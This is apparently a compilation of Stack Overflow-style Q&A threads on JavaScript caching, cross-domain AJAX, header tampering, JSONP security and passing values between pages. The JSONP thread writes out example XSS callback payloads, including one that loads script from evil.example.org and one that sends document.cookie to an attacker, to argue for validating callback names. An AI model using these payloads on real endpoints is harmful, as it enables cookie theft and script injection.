I've noticed that Firefox does not cache GET requests automatically. Here is the code I use:
var ajax = new XMLHttpRequest();
ajax.open("GET","page.php?val=" + val,true);
ajax.send();
With jQuery it is possible to pass cache: true. How can I cache the response with vanilla JavaScript (client side)? Is it also possible to decide for how long? Can you give me an example? Thanks in advance!
Web caching is largely controlled by the headers sent from the Server (Expires:, etc.). Browsers sometimes "cheat" and don't really cache even though the headers would allow them to ...probably because the user had used their UI to turn off caching, for example by setting the cache size to zero. But browsers that "cheat" the other direction, caching anyway even though the headers don't allow it, are (for good reason) extremely uncommon.
If caching is not happening for you, it's a function of the file and the server (or perhaps the browser configuration), not of any browser type or version. (To say the same thing a different way, your Firefox would cache just fine if the Server sent the needed headers.) The headers are controlled a variety of ways by different servers and different providers. For the Apache server, the nitty-gritty may be in a ".htaccess" file, pre-written templates of which are often available.
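For instance, with Apache an .htaccess sketch along these lines would do it (assuming mod_headers is enabled; the file pattern is just illustrative):
<IfModule mod_headers.c>
  <FilesMatch "\.(php|xml)$">
    Header set Cache-Control "public, max-age=1800"
  </FilesMatch>
</IfModule>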
To a first approximation, with HTML4, you simply cannot control web caching from the client side, no matter what tool you use and no matter what your program does. A generic exception is provided by the new "offline application cache" or "appcache" in HTML5 ...but with other restrictions, for example those about "one per site" and "same origin".
You can cache responses using a simple hash, something like:
var cache = {};
function getData(variable, callback) {
  if (cache[variable]) {
    callback(cache[variable]); // already fetched: serve from memory
    return;
  }
  var ajax = new XMLHttpRequest();
  ajax.open("GET", "page.php?val=" + encodeURIComponent(variable), true);
  ajax.onload = function () {
    cache[variable] = ajax.responseText; // store for later calls
    callback(ajax.responseText);
  };
  ajax.send();
}
That's a naive implementation of a caching mechanism: it only works for the lifetime of the page (i.e., until the page is refreshed or navigated away from), it has no expiration mechanism, and I'm sure it has other shortcomings. You could use localStorage to get around the refresh issue, for instance.
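A rough sketch of the localStorage variant with an expiry baked in (the key names and lifetime are up to you; JSON.stringify is needed because localStorage only holds strings):
function setCached(key, value, maxAgeMs) {
  localStorage.setItem(key, JSON.stringify({
    value: value,
    expires: Date.now() + maxAgeMs // absolute expiry time in ms
  }));
}
function getCached(key) {
  var raw = localStorage.getItem(key);
  if (!raw) return null;
  var entry = JSON.parse(raw);
  if (Date.now() > entry.expires) {
    localStorage.removeItem(key); // stale entry: drop it
    return null;
  }
  return entry.value;
}
For example, setCached("page.php?val=" + val, data, 30 * 60 * 1000) keeps an entry for 30 minutes across page loads.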
But hey, I'm not getting paid to write this :).
I am using the Requestly Chrome extension to intercept HTTP requests and modify their headers' original values before they reach my NodeJS app.
How can I prevent this kind of attack? For example, I can change the Referer header and inject a link.
There is no way to prevent users from doing this.
You can't trust the Referer header.
You cannot, but you can try to make it more difficult: think of a way to sign the headers/data (SHA-512, HMAC, etc.) and add the signature to the headers/cookies/data.
Use the same function on your server to check whether the values were modified in transit.
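A rough sketch of the server-side check with Node's built-in crypto module (the secret value, the x-signature header name, and the assumption that the client computes the same HMAC with an obfuscated embedded key are all illustrative):
const crypto = require('crypto');
const SECRET = 'shared-secret'; // also embedded (obfuscated) in the client code

function sign(value) {
  return crypto.createHmac('sha512', SECRET).update(value).digest('hex');
}

// Recompute the signature server-side and compare it to what the client sent
function isUntampered(req) {
  const expected = sign(req.headers['referer'] || '');
  const received = String(req.headers['x-signature'] || '');
  if (received.length !== expected.length) return false; // lengths must match for timingSafeEqual
  return crypto.timingSafeEqual(Buffer.from(expected), Buffer.from(received));
}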
"But the 'hacker' can still try to inspect the client code and use the signature function to modify the values ?"
Yes, but you can transform the thing in something completely illisible:
Make your app include a bench of useless big script which doing nothing (uglified of course)
Divide your signature function in many (many) functions named with random char and then uglified them, put one of them inside your useless big scripts.
...
Nothing on the client side can be trusted, but you can try to discourage attackers :D
I am doing a jquery.ajax() call on one of our pages to fetch a small text file. I see some of the requests (not all) fail with resp.statusText: "No Transport" and resp.status: 0.
What does the error mean (No Transport with a response code of 0)? Strangely, it works in some browsers and fails in others. I couldn't find a pattern by looking at the user agents of the browsers where it failed.
Any help would be highly appreciated. I am a beginner with JavaScript and the jQuery library, so let me know if I omitted crucial information.
My use case:
abc.mydomain.com contains jquery.ajax(url:xyz.mydomain.com) call
Most likely it prevents you from firing the request because it thinks you are trying to access another domain: xyz.mydomain.com !== abc.mydomain.com.
Why is that not allowed?
Read
Use a Web Proxy for Cross-Domain XMLHttpRequest Calls
Why the cross-domain Ajax is a security concern?
As an example of why this is a security issue: assume you installed a bad plugin in your browser. If that plugin has the permission, it can read all the files loaded into your browser, edit/change/inject content and code, and then send all the collected data to its designer's own server.
... The most common business needs that are easily accomplished with browser plug-ins are: modify default search, add side frames, inject new content into existing webpage ...more
A good practice is to fetch the data through Ajax as JSON; if you are trying to access a site other than the one the script was loaded from, use JSON-P (see the sketch after the links below).
Read
JSON-P
JSON-P call to subdomain
Chrome ajax call to subdomain
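For reference, a bare-bones JSON-P sketch (the endpoint URL and callback name here are made up):
function jsonp(url, callbackName, handler) {
  window[callbackName] = function (data) {
    delete window[callbackName]; // clean up the temporary global
    handler(data);
  };
  var script = document.createElement('script');
  script.src = url + '?callback=' + callbackName;
  document.head.appendChild(script);
}

jsonp('http://xyz.mydomain.com/data', 'handleData', function (data) {
  console.log(data);
});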
A common architecture is to call the same domain the script was loaded from, then use a server-side script to fetch the data from the other domain; the other domain responds to the server's request, and the server returns the data to the page.
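A sketch of that pattern with Node/Express on the server (the stack, route, and target URL are assumptions for illustration):
const express = require('express');
const https = require('https');
const app = express();

// Same-origin endpoint that relays the cross-domain request server-side
app.get('/proxy/data', function (req, res) {
  https.get('https://xyz.mydomain.com/data', function (upstream) {
    res.set('Content-Type', upstream.headers['content-type'] || 'text/plain');
    upstream.pipe(res); // stream the remote response back to the page
  }).on('error', function () {
    res.status(502).end();
  });
});

app.listen(3000);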
A code snippet of your function would help us understand your issue better.
I'm looking to make one XmlHttpRequest (every 30 minutes -- retrieving weather forecast) and use the XML response over multiple html documents. I've looked near and far and can only get the parsed XML to show on one document.
Is there a way to reference different documents from one javascript function?
No framework, just straight javascript/ajax.
// Note: the third argument is false, so this is a synchronous (blocking) request
var forecastXMLreq = new XMLHttpRequest();
forecastXMLreq.open("GET", forecastURL, false);
forecastXMLreq.send();
var forecastXML = forecastXMLreq.responseXML;
var day1 = forecastXML.getElementsByTagName("weekday_short")[1].childNodes[0].nodeValue;
document.getElementById("day1").innerHTML = day1.toUpperCase();
Multiple html files, one XHR call is what I'm looking for
The easiest way would be to leverage regular http caching. On the next pages, you still need to request the file in your code, but the browser can potentially skip the request and just automatically and transparently fetch from the local disk cache instead. You aren't guaranteed it will be cached for the full 30 minutes, as the browser has a limited amount of cache space and it decides what to purge, and when.
Just configure the server to send the following http header for that xml response
Cache-Control: max-age=1800
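With that in place, the response for the XML file should look roughly like this on the wire (other headers elided):
HTTP/1.1 200 OK
Content-Type: text/xml
Cache-Control: max-age=1800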
more info on http caching
http://www.mnot.net/cache_docs/
An alternative is to make use of the limited support browsers offer for HTML5 local storage. No web-server config is needed (although browser support is limited), and you don't need to re-request the file in your code, but then again you will have different code for retrieving it from local storage.
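A rough sketch of the local-storage route, assuming a 30-minute window and a made-up key name (the cached XML string has to be re-parsed, since localStorage only stores strings):
function getForecastXML(forecastURL, handler) {
  var entry = JSON.parse(localStorage.getItem('forecast') || 'null');
  if (entry && Date.now() - entry.at < 30 * 60 * 1000) {
    // Fresh enough: re-parse the stored string instead of re-requesting
    handler(new DOMParser().parseFromString(entry.xml, "text/xml"));
    return;
  }
  var req = new XMLHttpRequest();
  req.open("GET", forecastURL, true);
  req.onload = function () {
    localStorage.setItem('forecast',
      JSON.stringify({ xml: req.responseText, at: Date.now() }));
    handler(req.responseXML);
  };
  req.send();
}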
Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether or not it actually constitutes a vulnerability. Wanted to get the community's opinion to make sure I'm not missing something.
So, as with any jsonp system, we have an endpoint like:
http://foo.com/jsonp?cb=callback123
where the value of the cb parameter is replayed back in the response:
callback123({"foo":"bar"});
Customers have complained that we don't filter out HTML in the CB parameter, so they'll contrive an example like so:
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
Obviously, for a URL that returns the content type text/html, this poses a problem: the browser renders that HTML and then executes the potentially malicious JavaScript in the onload handler. It could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing. The user checks the domain, sees that it's one he trusts, and goes ahead and logs in.
But in our case we're setting the content type header to application/javascript, which causes different behaviors in different browsers: e.g., Firefox just displays the raw text, whereas IE opens up a "save as..." dialog. I don't consider either of those particularly exploitable. The Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it. And the IE user is probably going to be confused by the save-as dialog and hit cancel.
I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely. Is that the biggest threat here or is there some other vulnerability that I missed?
(Obviously I'm going to "fix" by putting in filtering to only accept a valid javascript identifier, with some length limit just-in-case; but I just wanted a dialog about what other threats I might have missed.)
Their injection would have to be something like </script><h1>pwned</h1>
It would be relatively trivial for you to verify that $_GET['callback'] (assuming PHP) is a valid JavaScript function name.
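For instance, in JavaScript terms (the regex is a deliberately conservative assumption, tighter than the actual identifier grammar):
function isValidCallback(name) {
  // letters, digits, _, $; dots allowed for namespaced callbacks like foo.bar
  return /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(name);
}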
The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.
HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.
Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value. The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.
Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. Like, if you had a "Comments" field in your response:
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
then that comment, whose value was x"+alert("haxored")+"y, would be an XSS attack. However, any good JSON encoder would prevent that by escaping the double-quote characters.
That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.
Another example would be making two requests like these:
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
which would call:
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
And evil.example.org/x.js would request:
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
which would call:
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
Possibilities are endless.
See Do I need to sanitize the callback parameter from a JSONP call? for an example of sanitizing a JSON callback.
Note: Internet Explorer tends to ignore the Content-Type header by default. It stubbornly sniffs the first few bytes of the HTTP response directly, and if the content looks like HTML, it will proceed to parse and execute it all as text/html, including inline scripts.
If that is the case, there's nothing to stop them from injecting code.
Imagine a URL such as http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.
As for how this is an attack vector: imagine an HTTP proxy that transparently forwards all URLs except http://example.com/jsonp, where it takes the cb part of the query string, prepends some malicious JS to it, and redirects to that URL.
As Pointy indicates, solely calling the URL directly is not exploitable. However, if any of your own javascript code makes calls to the JSON service with user-supplied data and either renders the values in the response to the document, or eval()s the response (whether now, or sometime in the future as your app evolves over time) then you have a genuinely exploitable XSS vulnerability.
Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?
Let's say I have a page that refers to a .js file. In that file I have the following code that sets the value of a variable:
var foo;
function bar() {
  foo = "some value generated by some type of user input"; // placeholder value
}
bar();
Now I'd like to be able to navigate to another page that refers to the same script, and have this variable retain the value set by bar(). What's the best way to transport the value of this variable, assuming the script will be running anew once I arrive on the next page?
You can use cookies.
Cookies were originally invented by Netscape to give 'memory' to web servers and browsers. The HTTP protocol, which arranges for the transfer of web pages to your browser and browser requests for pages to servers, is state-less, which means that once the server has sent a page to a browser requesting it, it doesn't remember a thing about it. So if you come to the same web page a second, third, hundredth or millionth time, the server once again considers it the very first time you ever came there.

This can be annoying in a number of ways. The server cannot remember if you identified yourself when you want to access protected pages, it cannot remember your user preferences, it cannot remember anything. As soon as personalization was invented, this became a major problem.

Cookies were invented to solve this problem. There are other ways to solve it, but cookies are easy to maintain and very versatile.
See: http://www.quirksmode.org/js/cookies.html
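A minimal cookie sketch (the cookie name and seven-day lifetime are arbitrary, and the name is assumed to contain no regex metacharacters):
function setCookie(name, value, days) {
  var expires = new Date(Date.now() + days * 864e5).toUTCString();
  document.cookie = name + "=" + encodeURIComponent(value) +
    "; expires=" + expires + "; path=/";
}

function getCookie(name) {
  var match = document.cookie.match(new RegExp("(?:^|; )" + name + "=([^;]*)"));
  return match ? decodeURIComponent(match[1]) : null;
}

// e.g. persist foo across pages:
setCookie("foo", foo, 7);
// ...and on the next page:
var foo = getCookie("foo");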
You can pass the value in the query string.
When the user navigates to the other page, append the value to the query string, then read it back on the next page.
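A small sketch of that approach (next.html and the parameter name are made up):
// Before leaving the current page:
location.href = "next.html?foo=" + encodeURIComponent(foo);

// On the next page:
function getQueryParam(name) {
  var match = location.search.match(new RegExp("[?&]" + name + "=([^&]*)"));
  return match ? decodeURIComponent(match[1]) : null;
}
var foo = getQueryParam("foo");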
Another option is jStorage. It is probably best used for cached data and lossy user preferences (e.g., the saved username in a login form), since it doesn't have full browser support (though IE6+ and most other common browsers support it) and, like cookies, cannot be relied upon to persist.
You can use YUI's Cookie Library http://developer.yahoo.com/yui/cookie/